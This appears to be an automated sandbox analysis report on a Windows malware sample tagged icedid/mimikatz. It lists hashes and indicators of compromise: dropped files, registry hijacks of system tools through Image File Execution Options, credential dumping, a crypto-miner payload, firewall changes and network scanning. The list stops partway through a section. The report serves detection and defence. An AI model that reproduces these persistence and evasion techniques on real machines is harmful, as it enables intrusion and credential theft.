Analysis
max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-04-2024 00:50

Behavioral task: behavioral1
Sample: 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
Resource: win7-20240221-en

General
Target: 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
Size: 8.5MB
MD5: 528357739aa4f0b9a2af7ad036639828
SHA1: 854fd936c1fba4aa9e36324b1a8c10503a497dc9
SHA256: 32dc01238f295ae4722a2c1e4db252d661e8bc95349deacd445ac79798b85209
SHA512: 7e7ea4415b6e8cc3f0913e224806f288bae95bb24e5a8ef5b4390af3081dde690370cd7a74f3db9742858ef489340c0aa9bb24bc8dc074dd39b09171511bc451
SSDEEP: 196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
  description | pid | process | target process
  PID 1836 created 2096 | 1836 | simzbkl.exe | spoolsv.exe
-
Contacts a large (30499) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/2776-135-0x00007FF691840000-0x00007FF69192E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
  behavioral2/memory/2776-136-0x00007FF691840000-0x00007FF69192E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
-
UPX dump on OEP (original entry point) 39 IoCs
-
XMRig Miner payload 11 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/456-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
  C:\Windows\tbzbbivf\simzbkl.exe | mimikatz
  behavioral2/memory/2776-135-0x00007FF691840000-0x00007FF69192E000-memory.dmp | mimikatz
  behavioral2/memory/2776-136-0x00007FF691840000-0x00007FF69192E000-memory.dmp | mimikatz
-
Drops file in Drivers directory 3 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | simzbkl.exe
  File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
  File created | C:\Windows\system32\drivers\etc\hosts | simzbkl.exe
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
  pid | process
  3760 | netsh.exe
  1528 | netsh.exe
-
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | simzbkl.exe
-
Executes dropped EXE 29 IoCs
Processes:
  pid | process
  5100 | simzbkl.exe
  1836 | simzbkl.exe
  4304 | wpcap.exe
  924 | eebtnglvf.exe
  2776 | vfshost.exe
  3224 | vmebnmlbn.exe
  1180 | xohudmc.exe
  2776 | nslfoo.exe
  2172 | gzbahn.exe
  4680 | vmebnmlbn.exe
  60 | vmebnmlbn.exe
  2344 | vmebnmlbn.exe
  440 | vmebnmlbn.exe
  4156 | vmebnmlbn.exe
  3752 | vmebnmlbn.exe
  4568 | vmebnmlbn.exe
  4088 | vmebnmlbn.exe
  2016 | simzbkl.exe
  2876 | vmebnmlbn.exe
  1048 | vmebnmlbn.exe
  4692 | vmebnmlbn.exe
  1652 | vmebnmlbn.exe
  1488 | vmebnmlbn.exe
  4332 | vmebnmlbn.exe
  1988 | vmebnmlbn.exe
  2248 | vmebnmlbn.exe
  3572 | vmebnmlbn.exe
  4236 | bvbvfuizb.exe
  5508 | simzbkl.exe
-
Loads dropped DLL 12 IoCs
Processes:
  pid | process
  4304 | wpcap.exe
  4304 | wpcap.exe
  4304 | wpcap.exe
  4304 | wpcap.exe
  4304 | wpcap.exe
  4304 | wpcap.exe
  4304 | wpcap.exe
  4304 | wpcap.exe
  4304 | wpcap.exe
  924 | eebtnglvf.exe
  924 | eebtnglvf.exe
  924 | eebtnglvf.exe
-
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  137 | ifconfig.me
  138 | ifconfig.me
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
  File created | C:\Windows\system32\Packet.dll | wpcap.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | simzbkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 | simzbkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | simzbkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | simzbkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | simzbkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | simzbkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | simzbkl.exe
  File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | simzbkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | simzbkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | simzbkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 | simzbkl.exe
  File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
  File created | C:\Windows\system32\wpcap.dll | wpcap.exe
  File created | C:\Windows\SysWOW64\nslfoo.exe | xohudmc.exe
  File opened for modification | C:\Windows\SysWOW64\nslfoo.exe | xohudmc.exe
-
Drops file in Program Files directory 3 IoCs
Processes:
  description | ioc | process
  File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
  File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
  File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
-
Drops file in Windows directory 60 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\exma-1.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\ucl.dll | simzbkl.exe
  File opened for modification | C:\Windows\tbzbbivf\svschost.xml | simzbkl.exe
  File opened for modification | C:\Windows\tbzbbivf\schoedcl.xml | simzbkl.exe
  File opened for modification | C:\Windows\gtuqsjqjh\bnafefjyn\Result.txt | bvbvfuizb.exe
  File created | C:\Windows\gtuqsjqjh\bnafefjyn\bvbvfuizb.exe | simzbkl.exe
  File opened for modification | C:\Windows\tbzbbivf\spoolsrv.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\svschost.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\posh-0.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\tucl-1.dll | simzbkl.exe
  File created | C:\Windows\tbzbbivf\vimpcsvc.xml | simzbkl.exe
  File opened for modification | C:\Windows\tbzbbivf\docmicfg.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\cnli-1.dll | simzbkl.exe
  File created | C:\Windows\tbzbbivf\schoedcl.xml | simzbkl.exe
  File opened for modification | C:\Windows\gtuqsjqjh\Corporate\log.txt | cmd.exe
  File created | C:\Windows\tbzbbivf\docmicfg.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\ssleay32.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\xdvl-0.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\schoedcl.exe | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\spoolsrv.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\docmicfg.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\AppCapture32.dll | simzbkl.exe
  File created | C:\Windows\tbzbbivf\simzbkl.exe | 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
  File created | C:\Windows\ime\simzbkl.exe | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\vimpcsvc.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\bnafefjyn\scan.bat | simzbkl.exe
  File opened for modification | C:\Windows\gtuqsjqjh\bnafefjyn\Packet.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\svschost.exe | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\libxml2.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\vimpcsvc.xml | simzbkl.exe
  File created | C:\Windows\tbzbbivf\spoolsrv.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\spoolsrv.exe | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\libeay32.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\AppCapture64.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\coli-0.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\zlib1.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\schoedcl.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\crli-0.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\bnafefjyn\ip.txt | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\Corporate\mimidrv.sys | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\vimpcsvc.exe | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\docmicfg.exe | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\trfo-2.dll | simzbkl.exe
  File created | C:\Windows\tbzbbivf\svschost.xml | simzbkl.exe
  File opened for modification | C:\Windows\tbzbbivf\vimpcsvc.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\Shellcode.ini | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\bnafefjyn\Packet.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\trch-1.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\docmicfg.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\Corporate\vfshost.exe | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\svschost.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\schoedcl.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\spoolsrv.xml | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\Corporate\mimilib.dll | simzbkl.exe
  File created | C:\Windows\gtuqsjqjh\upbdrjv\swrpwe.exe | simzbkl.exe
  File opened for modification | C:\Windows\tbzbbivf\simzbkl.exe | 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
  File created | C:\Windows\gtuqsjqjh\UnattendGC\specials\tibe-2.dll | simzbkl.exe
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  4464 | sc.exe
  956 | sc.exe
  4784 | sc.exe
  2864 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
  resource | yara_rule
  C:\Windows\tbzbbivf\simzbkl.exe | nsis_installer_2
  C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe | nsis_installer_1
  C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe | nsis_installer_2
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  4284 | schtasks.exe
  956 | schtasks.exe
  400 | schtasks.exe
-
Modifies data under HKEY_USERS 45 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | simzbkl.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | simzbkl.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | simzbkl.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | simzbkl.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | simzbkl.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | vmebnmlbn.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | simzbkl.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | vmebnmlbn.exe
-
Modifies registry class 14 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | simzbkl.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | simzbkl.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | simzbkl.exe
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid | process
660 | (process name not recorded; 15 identical entries)
-
Suspicious behavior: RenamesItself 1 IoCs
Processes:
pid | process
456 | 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 456 | 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege | 5100 | simzbkl.exe
Token: SeDebugPrivilege | 1836 | simzbkl.exe
Token: SeDebugPrivilege | 2776 | vfshost.exe
Token: SeDebugPrivilege | 3224 | vmebnmlbn.exe
Token: SeLockMemoryPrivilege | 2172 | gzbahn.exe
Token: SeLockMemoryPrivilege | 2172 | gzbahn.exe
Token: SeDebugPrivilege | 4680 | vmebnmlbn.exe
Token: SeDebugPrivilege | 60 | vmebnmlbn.exe
Token: SeDebugPrivilege | 2344 | vmebnmlbn.exe
Token: SeDebugPrivilege | 440 | vmebnmlbn.exe
Token: SeDebugPrivilege | 4156 | vmebnmlbn.exe
Token: SeDebugPrivilege | 3752 | vmebnmlbn.exe
Token: SeDebugPrivilege | 4568 | vmebnmlbn.exe
Token: SeDebugPrivilege | 4088 | vmebnmlbn.exe
Token: SeDebugPrivilege | 2876 | vmebnmlbn.exe
Token: SeDebugPrivilege | 1048 | vmebnmlbn.exe
Token: SeDebugPrivilege | 4692 | vmebnmlbn.exe
Token: SeDebugPrivilege | 1652 | vmebnmlbn.exe
Token: SeDebugPrivilege | 1488 | vmebnmlbn.exe
Token: SeDebugPrivilege | 4332 | vmebnmlbn.exe
Token: SeDebugPrivilege | 1988 | vmebnmlbn.exe
Token: SeDebugPrivilege | 2248 | vmebnmlbn.exe
Token: SeDebugPrivilege | 3572 | vmebnmlbn.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
pid | process
456 | 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
456 | 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
5100 | simzbkl.exe
5100 | simzbkl.exe
1836 | simzbkl.exe
